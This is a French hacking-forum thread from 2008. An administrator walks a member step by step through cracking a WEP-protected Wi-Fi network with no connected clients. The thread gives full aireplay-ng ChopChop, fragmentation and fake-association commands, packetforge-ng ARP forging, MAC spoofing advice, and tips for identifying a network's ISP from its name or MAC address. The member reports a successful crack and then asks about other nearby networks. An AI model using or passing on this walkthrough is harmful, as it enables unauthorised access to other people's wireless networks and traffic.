Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 26-08-2008 15:22:11

TAK
Membre
Inscription : 26-08-2008
Messages : 12

Aucun #Data en attaque ChopChop..

Bonjour à tous,

J'essaie actuellement de cracker une clé WEP OPN en utilisant ChopChop car il n'y a aucune station connectée...

J'ai essayé de suivre un tuto (sur le site brico-wifi), tout se déroule bien jusqu'à :

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b FE:1F:79:DD:B8:38 -h 11:22:33:44:55:66 wlan0

Read 10 1160 packets...

Mais j'ai aucun Data ni Data/s.... pour info : PWR 50, RXQ 24, beacons 26500, CH 11, MB 54, ENC WEP, AUTH OPN, ESSID Maison


ça fait 2 fois que je lance cette commande mais il ne se passe rien...

Qu'ai-je mal fait ? dois-je juste attendre ?

Merci d'avance,
TAK

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 26-08-2008 20:14:36

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Aucun #Data en attaque ChopChop..

Pour le crack WEP sans client, je te recommande d'utiliser l'attaque Chopchop (aireplay-ng -4). Sur le meme principe, l'attaque dite "par fragmentation (aireplay-ng -5) peut également fonctionner sans client connecté, lorsque tu utilise aireplay-ng -1 en parallèle afin de t'associer régulièrement au point d'accès. Lis bien attentivement le topic dont je t'ai donné le lien, tout y est expliqué wink

Hors Ligne

#3 26-08-2008 20:51:38

TAK
Membre
Inscription : 26-08-2008
Messages : 12

Re : Aucun #Data en attaque ChopChop..

FORGER SES REQUETES ARP

D'abord il faut decrypter un paquet
aireplay-ng -4 wlan0 -a "mac ap" -h "mac station"

Ensuite trouver l'ip (qui est probablement 192.168.1.1 ou 192.168.1.2 ou 192.168.0.1, étape facultative car en fonction du type d'AP tu peux, par experience, connaitre son ip)
tcpdump -s 0 -n -e -r nomdupaquetdécrypté.cap ou
tcpdump -n -vvv -e -s0 -r nomdupaquetdécrypté.cap
(je n'ai pas trop l'habitude d'utiliser tcpdump, je te laisse le soin de tester)

Maintenant il faut forger une requete arp
packetforge-ng -0 -a "mac ap" -h "mac station" -k 192.168.1.1 -l 192.168.1.10 -y ton-fichier.xor -w ton-arp-forgée.cap

Maintenant on peut envoyer cette requette pour faire grimper les ivs!
aireplay-ng -3 -e "essid" -a "mac ap" -b "mac ap" -h "mac station" -x600 -r ton-arp-forgée.cap wlan0

En l'absence de client cette methode fonctionne aussi si on se fait passer pour un client sur un autre shell, on decrypte alors les paquets qu'on a soi meme envoyé mais ça marche!
aireplay-ng wlan0 -1 30 -e "essid" -a "mac ap" -h "mac station"

Notes: la fragmentation (aireplay-ng -5) peut également etre utilisée pour fabriquer des arp. Ce type d'attaque ne fonctionne pas dans 100% des cas, mais c'est impressionnant quand ça fonctionne de se rendre compte qu'on peut cracker un réseau WEP sans qu'un client soit connecté!

"-h (mac station)" je mes ma mac changée avec maccchanger (11:22:33:44:55:66) ? car je n'ai pas de station de connectée...

Hors Ligne

#4 26-08-2008 20:54:59

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Aucun #Data en attaque ChopChop..

Tout à fait, si le filtrage mac n'est pas activé sur la box tu peux utiliser l'adresse mac de ton choix pour le paramètre -h (station). Je précise qu'il est inutile pour l'insatnt de spoofer ta mac avec macchanger, airodump-ng le fait automatiquement en utilisant le paramètre -h. Tu utilise macchanger lorsque tu repasse en mode managed, pour te connecter en spoofant une adresse mac wink

Hors Ligne

#5 26-08-2008 21:19:25

TAK
Membre
Inscription : 26-08-2008
Messages : 12

Re : Aucun #Data en attaque ChopChop..

J'ai lancé

aireplay-ng -4 wlan0 -a "mac ap" -h "mac station"

y'a marqué comme tout à l'heure "Read **** packets..." j'ai une autre console d'ouverte avec dedans "airodump-ng --bssid FE:1F:79:DD:B8:38 wlan0" et toujours aucun data....

Dois-je juste attendre ? combien de temps ?

Hors Ligne

#6 26-08-2008 21:25:24

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Aucun #Data en attaque ChopChop..

Lis bien ce que j'ai écrit:

En l'absence de client cette methode fonctionne aussi si on se fait passer pour un client sur un autre shell, on decrypte alors les paquets qu'on a soi meme envoyé mais ça marche!
aireplay-ng wlan0 -1 30 -e "essid" -a "mac ap" -h "mac station"

Donc tu dois lancer aireplay-ng -1 30 en parallèle pour que l'attaque chopchop fonctionne.

La maitrise de ce type d'attaque demande du temps, et un peu de pratique. Suis mes indications, et ça devrait rouler wink

Hors Ligne

#7 26-08-2008 21:35:40

TAK
Membre
Inscription : 26-08-2008
Messages : 12

Re : Aucun #Data en attaque ChopChop..

Finalement j'ai attendu un peu et il m'a trouvé un "truc" et m'a demandé si je veus "Use this packet ?" j'ai répondu "y"

"Sent 9408 packets, current guess : CE...
The chopchop attack appears to have failed. possible reasons:

....."

J'arrive pas à lancer aireplay-ng -1 30 il me sort a chaque fois une erreur sur le channel qui n'est pas le channel 11 comme l'AP, quelque chose dans le genre...

Dernière modification par TAK (26-08-2008 21:40:56)

Hors Ligne

#8 26-08-2008 21:41:22

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Aucun #Data en attaque ChopChop..

Lorsque tu sélectionne ton paquet, avant de valider avec y, tu dois vérifier qu'il vient bien de l'AP que tu cible (c'est indiqué en tant que source, il me semble, regarde si l'adresse mac correspond). Pour ton problème de canal, évite d'utiliser une carte en channel hopping, utilise le paramètre -c numéro-du-canal dans ta commande airodump-ng (tu dois bien évidemment capturer avec airodump-ng parallèlement à l'attaque pour pouvoir lancer le crack plus tard).

Hors Ligne

#9 26-08-2008 21:46:47

TAK
Membre
Inscription : 26-08-2008
Messages : 12

Re : Aucun #Data en attaque ChopChop..

Merci pour l'expliquation,

J'ai tout relancé comme il faut et là j'ai les 3 consoles d'ouvertes en même temps et chacune travaille :

1.airodump-ng...
2.aireplay-ng -1 30...
3. aireplay-ng -4...

C'est bon ?

Hors Ligne

#10 26-08-2008 22:01:58

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Aucun #Data en attaque ChopChop..

Tu es sur la bonne voie, maintenant il te faut de la patience, au travail wink

Hors Ligne

#11 26-08-2008 22:08:51

TAK
Membre
Inscription : 26-08-2008
Messages : 12

Re : Aucun #Data en attaque ChopChop..

il m'a trouvé un packet qui allait avec la bonne bssid, mais malheureusement il me ressort la même erreur... JE remarque que j'ai des data : fleche du haut : je recommence aireplay-ng -4... il me trouve presque instantanement un autre packet qui va aussi : même résultat ... j'essai plusieures fois : pareil....

J'ai stoppé la console 2 (-1 30).

Je dois faire quoi ?

Hors Ligne

#12 27-08-2008 12:04:32

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Aucun #Data en attaque ChopChop..

Tu dois etre patient et te remettre au travail, en cherchant à comprendre ce que tu fais, et en sachant que l'attaque Chopchop ne fonctionne pas à tous les coups...

Hors Ligne

#13 27-08-2008 16:07:30

TAK
Membre
Inscription : 26-08-2008
Messages : 12

Re : Aucun #Data en attaque ChopChop..

Donc si j'ai bien compris, je dois essayer de faire ça jusqu'à qu'il ne me sorte plus l'erreur, moment auquel je pourrais continuer la procédure avec tcpdump et tout le reste ...

Peut-on savoir de l'essid/bssid de quel opérateur/box provient le réseau wifi ?

Hors Ligne

#14 27-08-2008 19:17:53

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Aucun #Data en attaque ChopChop..

Oui, tu dois tester avec plusieurs paquets, jusqu'à ce que ça fonctionne. Parfois l'attaque Chopchop ne fonctionne pas du tout, cela dépend de la box et de la qualité du signal wifi. Si tu n'y arrive pas au bout d'une heure, c'est que ta box de test n'est probablement pas vulnérable à l'attaque chopchop.

Pour ta 2ème question, il est clair que la plupart des essids te disent clairement quel est le F.A.I, exemple:

"Livebox-a1b2" FAI Orange
"NEUF_A1B2" FAI Neuf Telecom
etc...

Ensuite, meme si l'essid a été modifié tu peux parfois deviner le fournisseur d'accès en fonction de l'adresse mac de la box, pour cela tu as besoin d'expérience (avec le temps tu sais à quel F.A.I. correspondent les adresses mac de certaines box), ou bien d'une petite recherche google pour te mettre sur la voie.

Hors Ligne

#15 27-08-2008 19:22:22

TAK
Membre
Inscription : 26-08-2008
Messages : 12

Re : Aucun #Data en attaque ChopChop..

Merci pour ces expliquations wink

Je suis trop content là je viens de cracker ma première WEP big_smile Bon c'est une 64Bits mais c'est déjà un début !

J'ai des wifi nommés "<-lenght" ou quelque chose dans ce style, ou encore Freephonie... dont je n'arrive pas à savoir même après une recherche google...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.033 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]